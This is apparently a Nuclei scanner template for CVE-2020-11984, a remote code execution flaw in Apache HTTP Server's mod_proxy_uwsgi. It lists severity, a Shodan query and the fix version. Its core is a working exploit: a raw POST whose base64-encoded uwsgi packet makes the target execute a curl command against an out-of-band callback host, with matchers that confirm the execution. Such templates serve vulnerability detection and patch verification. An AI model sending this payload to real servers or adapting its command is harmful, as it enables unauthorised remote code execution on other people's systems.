Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
PoC代码[已公开]
id: CVE-2020-11984
info:
name: Apache HTTP Server - Remote Code Execution
author: wofeiwo@80sec.com,pszyszkowski,pdresearch,iamnoooob
severity: critical
description: |
Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
remediation: |
Update to >= 2.4.45
reference:
- https://github.com/RubenBar/MLW-upcrans/tree/main/1.Exploit
- https://nvd.nist.gov/vuln/detail/cve-2020-11984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11984
cwe-id: CWE-120
epss-score: 0.76313
epss-percentile: 0.98869
metadata:
verified: true
max-request: 1
vendor: apache
product: http_server
shodan-query: cpe:"cpe:2.3:a:apache:http_server"
tags: cve,cve2020,apache,httpd,rce,vkev,vuln
variables:
oast: ".{{interactsh-url}}"
payload: "{{padding(oast,'a',54,'prefix')}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{replace(base64_decode('AHIAAAoAVVdTR0lfRklMRUsAZXhlYzovL2N1cmwgYWFhYWFhYWEuZmw0NGhoY240NHEydWtsdjI5YnB6dTR1amxwY2QzM3JzLm9hc3RpZnkuY29tOyBlY2hvICIiCwBTQ1JJUFRfTkFNRQoAL3BlbmV0cmF0ZQ=='),'aaaaaaaa.fl44hhcn44q2uklv29bpzu4ujlpcd33rs.oastify.com',payload)}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'contains(interactsh_request, "User-Agent: curl")'
condition: and
# digest: 490a004630440220365f20d6e45d1c8dd96f35eb27f1d115578ad24d1a531a151f30ff35db288eac02203610c9346eec443fe83b7d40229659f765f21569b9c56347cea709f5575e45c7:922c64590222798bb761d5b6d8e72950